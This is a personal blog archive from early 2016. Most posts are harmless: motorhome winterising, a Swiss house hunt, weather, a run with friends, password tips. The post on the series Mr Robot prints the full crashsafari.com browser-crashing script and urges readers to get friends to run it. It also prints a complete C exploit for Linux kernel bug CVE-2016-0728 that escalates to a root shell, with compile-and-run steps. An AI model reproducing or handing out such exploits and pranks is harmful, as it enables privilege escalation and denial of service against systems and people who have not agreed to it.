Sunday, January 31, 2016

Sunday Sermon: Heavenly Perspectives




Talking Heads: Heaven

In 2014 I talked more fully about heaven.   You should refer back to that article if you missed it.  For todays sermon I invite you to some more carefully chosen perspectives on heaven.






Corey the Wonder Kid: Heaven






The Invention of Lying: After Death


Of course you might be interested in what some of the major faiths actually believe when it comes to the afterlife.  In which case I would of course recommend BBC's Beyond Belief





Beyond Belief: Heaven

Beyond Belief: Heaven download .mp3


Hymn For the Weekend



Coldplay: Hymn for the weekend





Saturday, January 30, 2016

Marcus Agata and Stuart visit Croy




As motorhome owners Marcus and Agata can now confirm that it is not all carefree travelling to holiday destinations.

There is maintenance!

Winter Maintenance
During the winter it very unlikely that you will be using your Motorhome.  Why?  Because unless it is full winterised you just can't use it.

Full winterisation normally includes

- Winter tyres
- Selection of appropriate winter options when ordering the motorhome.
- At the minimum the insulation of water pipes so that they don't freeze
- Can include electrically heated pipeworks
- Insulation of the water tanks
- A larger central heating system

The Ideal Position
In the ideal world

- Your motorhome will have all the winterisation options
- You will use your motorhome during winter, say to the ski resorts
- At other times will store your motorhome inside during cold weather
- You will have a mains i.e. 240V (in Europe) electrical hookup


The Actual Position
- We specified the Dethleffs winterisation options.  Our Globus is not a dual (insulated) floor model.  So we cannot have Electrically heated pipes.  We have
- Insulated Pipes
- A larger Truma Air Heating system with Gas or Mains Electric power
- We don't have any chance for winter inside storage or electric hookup

Visit Often
The vast majority of motorhome owners are in a similar position to us.  The received wisdom is to visit the motorhome often, start the engine,  put the heater on max, and try to not to add to the moisture in the motorhome before you lock it back up.

Additional tips

- Drain all water tanks (input and output)
- Leave Diesel tank full
- Remove toilet cassette
- Remove all perishable foods or items that can ruin with moisture
- Make sure the winter water safety draining valve is open 


Hot Switzerland


With the current January 2016 heat wave, and in a week where ALL the snow in our Swiss canton of Vaud has melted (ski resorts excepted) we took the opportunity to take our motorhome Stuart on a day out.   We thought he'd appreciate a battery recharge and movement of his mechanical systems 


Visiting Croy
We continue to look for a modest Swiss property, today we venture to the site of a new housing development in Croy, in canton Vaud Switzerland.

Apologies:
Marcus's Smartphone camera is having quality problems, a failure of the focusing, with his Android 6.0.1 beta  (Agata mumbled something about her evil iPhone, I remind her, when the bugs are fixed, my almost 3 year old phone's camera will still be better than her fancy phone)


 Croy,  Basically in the middle of nowhere!



 A large old peoples home with lots of activity and smiling old people.   Ironically we found later it is situated next to a grave-yard.




 Town was quite tiny and we tried saying Bonjour to the locals, who for the most part did not reply.  Hmm.  Unusual.


 Some wood cutting next to the proposed development ...


We find it



A tank full of poo :-) to spray on neighbouring fields

Yes, so they did not start building yet.  Also there is NO sign here either.  All one can see is a lot of mud, some cows, and the fact that your house will be sitting amongst farms with 'a country smell' :-)




 Croy has a railway station.  This is actually a big plus.  Meaning you can get from your home to the airport and leave your car at home.  Or commute to work and friends without using your car. Yes, you will need a car because there are NO shops of any description in this town.  No amenities apart from the railway station and the hotel de gare.


Romainmotier

With Croy being a disappointment we walked  over to the nearby town of Romainmotier.  

Adjacent town did contain some shops including a Post Office.  And a monastery, though no monks were observed at all


We are really in the countryside!


Overall
The mission to exercise Stuart succeeded handsomely.   The evaluation of Croy as a possible new home was negative.













Friday, January 29, 2016

The Future's so Bright





Future's so Bright


To outsiders the weather in Switzerland may just be of passing interest.  But to Marcus and Agata we realise it's a cornerstone of the economy of our Canton.  That is Vaud Switzerland.

As the locals know 2 key industries are Swiss wine and Swiss Ski resorts.  Both are very temperature sensitive.

Just 2 days ago I found that we don't even have an hours drive to the local ski resort.  We used to goto Champery but friends have pointed out that St George is a mere 30 minutes drive away.

We talked about our Snow run here




But even at over 1000 metres altitude at this temperature the Snow is melting ... fast.



We recently also talked  with slight sarcasm that we hoped that the 3 days of winter  would be all that we would experience this year.


So what in reality is the Position?




- 2015 was a year of heat records in many parts of Switzerland



- We are big fans of it melting in our neighbourhood.  We are at about 700 metres altitude and unless we get dry roads it is unacceptably dangerous to put in our desired daily training cycle at speed.




 - It is so sunny and hot that I am testing out the portable solar panels for our summer 'off grid adventures' on our balcony! In January!  Yikes



So bright that non DSLR photographs come out all wrong because it is so sunny





So bright and hot that our Balcony thermostat keeps telling us it is over 30 degrees C outside  (it's not obviously!)





- So please: Dear Snow gods.  Please can we have it dry and warm upto about 1000 metres and we will gladly endorse heavy snow at 2000 metres and above and moderate snow from 1000 metres up.




ZZ Top: Cheap Sunglasses


Thursday, January 28, 2016

Getting Out More



Really, I cannot express our emotions as well as the lead singer of Supertramp shown above.  But regardless, I do hope that you will read on.


The Routine
Marcus and Agata still lead quite busy lives but we often look inward and our interactions with the wider world seem few. Many people are likewise here.  It could be being timid, sticking to what you know to avoid disappointment or criticism, or just getting stuck into a rut.



We ventured outside


I could easily use the excuse that we sauntered  upto St George at just over 1000 metres altitude ony because we just wanted to check that the Swiss winter, really is over!  



You can see the Nordic ski paths and the signs say that beyond certain points you can only ski.  So our run will need to take account of that.




The usual beautiful Swiss mountain views.  And no other people!  


We met up with Kathy and Dominik who is now just 3 months old




 Marcus inspects this new concept.  A baby.





 Agata runs really fast


Marcus starts doing laps.   This is absolutely fantastic exercise.

During the Course of this Lunchtime

- Marcus indeed confirmed, the snow is melting fast

- We had a nice run

- We met up with other people :-!

- Marcus had a nice chat with an Oil consultant, and we talked about Oil price futures.  I was so excited!

- There was great exercise

- We stopped off for a lunch and chat.



You Know it
Now of course we all know it: Staying at home is all very comforting, but if you never venture out to taste new experiences and meet new people:  Well, then your lives become rather mundane and boring.


Our Conclusions
Whilst we are both quite timid,  Marcus is elated that we actually got out of the house, did something different, and actually conversed and interacted with some <other> people.








Links





Wednesday, January 27, 2016

Hell is Other People





Sigma: Nobody [left] to Love M&N


Yes, this last weekend Marcus and Agata have been continuing to re-file and encrypt all our sensitive documentation. We spent another 4 hours each on Saturday. We are still not finished.


You might ask, so what is your password strategy then?


The Radio 4 password Hash



As new converts to the disturbing series Mr Robot,  Marcus, unashamed, lifelong Engineer & Computer person is likewise happy to discuss my innermost thoughts & thus password strategy online.  Just in case any hackers are reading and need some cracker tips.

 
- Tune into Radio 4
- Start listening
- At random choose a word, or two
- Go for a coffee (provides random time interval) 
- Repeat multiple word choice
- Now you have about 4 or more words
- Compose a password using these words
- Add some random capitalisation
- Add some random numbers for letters (e.g. replace i with 1)
- From a palette of all the non alpha characters including space, !@#$%^&*()_+-={}[]:";'<>?,./  throw multiple occurences into the password in random places
- Now that is the password

- Oh, and never write the password down
- And, never use the same password twice
- And always use 2 step authentication
- And always select replace password with frequency option if available
- And be mindful where your authentication generators are stored
- Oh and if you do have to encrypt something, always triple encrypt it, and I just love 512bit hashes.

Meanwhile Agata
Agata is using a /well known/ https based and companion local and secure application to store her passwords and also ones that the app generates for her.  The later are complete gobbledygook  but nothing that a copy paste can't enter into an application.





Summary



In summary 
I'll never forgive terrorists for killing innocent people and for perpetually disrupting the lives of honest law abiding people every day.

And right behind them, the wankers, the criminals that force me to continuously downward adjust my carefree and trusting lifestyle to protect myself from those who would wish to steal my data.

Screw you.


#Password
#PasswordStrategies
#Satre


Tuesday, January 26, 2016

Mr Robot



Mr Robot




I think I can speak more for myself and relate the many decades of intimate Computer involvement that has lead Marcus to really appreciate the US Television Series about a Programmer who is just slight awkward away from his computer(s).


I think about all those hours of self study with books, of soldering breadboards in basements, and of just trying to figure out how that kernel or TTL circuit worked.


Things are much easier today, there is something called the Internet and a way to search the public web, via Google, to answer almost any question.


But for those of us at a certain age, and dedication, you might feel affinity for the isolation, the trauma, and occasional elation of our flawed hero, Elliot as he tries to


Well ... you will just have to watch it right.



Your Starter for 10  
<-- click after reading below only


Perhaps to get your interest, why not tell your best Apple friends, you know, the smug and superior ones that are always telling you how their computers are the best, to run

crashsafari.com

from within their safari web browser. It does what the title suggests, so if you are a chicken, or if you are so dumb that you did not save all your work before proceeding, then of course don't run it.


Here is what happens on my Windows Test computer running with Chrome browser x64.


Before we start  crashsafari.com

Now let us start it from within Chrome .....


 85 percent CPU



 6.7 GB of memory used



9 GB of memory used



 Windows automatically kills the hog







So as you can see with Windows 10, build 11102, and Chrome Canary 64, build 50.0.2630.0, we survived just fine. The OS did not crash, but the offending Chrome Window (only) that was gobbling about 6GB of memory was closed. Good job.


What happens to your Apple OSX or iOS system & Safari then?


Oh, And Here is the code
<!DOCTYPE html>
<html>
    <body>
        <h1>What were you expecting?</h1>
        <script>
            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
                    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
                    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

                    ga('create', 'UA-60737367-1', 'auto');
                    ga('send', 'pageview');
                </script>
                <script>
                    var total = "";
                    for( var i = 0; i < 100000; i++ ) {
                        total = total + i.toString();
                        history.pushState(0,0, total );
                    }
                </script>
            </body>

        </html>


The script, which I researched, and is incidentally many months old, appears to do its dastardly work by using the history.pushstate() call to push a rather large number of entries into the browser history.



A Linux Exercise

To get you interested in Linux exploits here is a way to test out a recent and potentially serious root level exploit. In baby steps


- You will need a Linux system and a gcc, C compiler installed


- You can read about the Keyring issue from Perception Point who discovered it

- Their explanation is a bit technical so instead you can go for a more alarmist report, or perhaps a more balanced one

- This is the root exploit  Keyring problem , known as 
CVE-2016-0728

- For the purposes of the demonstration I'll use a Ubuntu based Linux distribution called Linux Mint at release 17.3

- Kernel is at 3.19.0-32

- Put the following program into a file  (press control-d at end to close the stream and create the file


cat > sudoh.c
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>

#include <sys/ipc.h>
#include <sys/msg.h>

#define KEYCTL_SYSCALL_NR (250)

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)

void *
get_symbol(char *name)
{
    FILE *f = fopen("/proc/kallsyms", "r");
    char c, sym[512];
    void *addr;

    while (fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0) {
        if (!strcmp(sym, name))
            return addr;
    }

    return NULL;
}

struct key_type {
    char * name;
    size_t datalen;
    void * vet_description;
    void * preparse;
    void * free_preparse;
    void * instantiate;
    void * update;
    void * match_preparse;
    void * match_free;
    void * revoke;
    void * destroy;
};

void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}

int main(int argc, const char *argv[]) {

const char *keyring_name;
size_t i = 0;
    unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
    struct key_type * my_key_type = NULL;
    
struct { long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;

if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}

    printf("uid=%d, euid=%d\n", getuid(), geteuid()); 
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    
    my_key_type = malloc(sizeof(*my_key_type));

    my_key_type->revoke = (void*)userspace_revoke;
    memset(msg.mtext, 'A', sizeof(msg.mtext));

    // key->uid
    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
    //key->perm
    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

    //key->type
    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }

    keyring_name = argv[1];

/* Set the new session keyring before we start */

serial = syscall(KEYCTL_SYSCALL_NR, KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
    }
if (syscall(KEYCTL_SYSCALL_NR, KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}


puts("Doh a deer ...");
    for (i = 1; i < 0xfffffffd; i++) {
        if (i == (0xffffffff - l)) {
            l = l/2;
            sleep(5);
        }
        if (syscall(KEYCTL_SYSCALL_NR, KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
    sleep(5);
    /* here we are going to leak the last references to overflow */
    for (i=0; i<5; ++i) {
        if (syscall(KEYCTL_SYSCALL_NR, KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }

    puts("a female deer ");
    puts("forking...");
    /* allocate msg struct in the kernel rewriting the freed keyring object */
    for (i=0; i<64; i++) {
        pid = fork();
        if (pid == -1) {
            perror("fork");
            return -1;
        }

        if (pid == 0) {
            sleep(2);
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
            for (i = 0; i < 64; i++) {
                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
            sleep(-1);
            exit(1);
        }
    }
   
    puts("finished forking");
    sleep(5);

    /* call userspace_revoke from kernel */
    puts("caling revoke...");
    if (syscall(KEYCTL_SYSCALL_NR, KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
        perror("keyctl_revoke");
    }

    printf("uid=%d, euid=%d\n", getuid(), geteuid());
    execl("/bin/sh", "/bin/sh", NULL);

    return 0;
}



- Add in libkeyutils because it is missing on my Ubuntu

sudo apt-get install libkeyutils-dev


- Now compile up the program
gcc sudoh.c -o sudoh -lkeyutils -Wall

- Now run & this took > 30 minutes to complete on my 4 core system:
./sudoh PP1




As you can see the exploit DID NOT work on this ubuntu system. Great. But how about on your system?



When you have worked thru all that I recommend you apply your brain to finding yourself a legal copy of Mr Robot ... available on Amazon Prime, and: all the usual sources.





Rami Malek dialog



Mr Robot Youtube channel videos


#crashsafari.com


Links
Meanwhile at Lenovo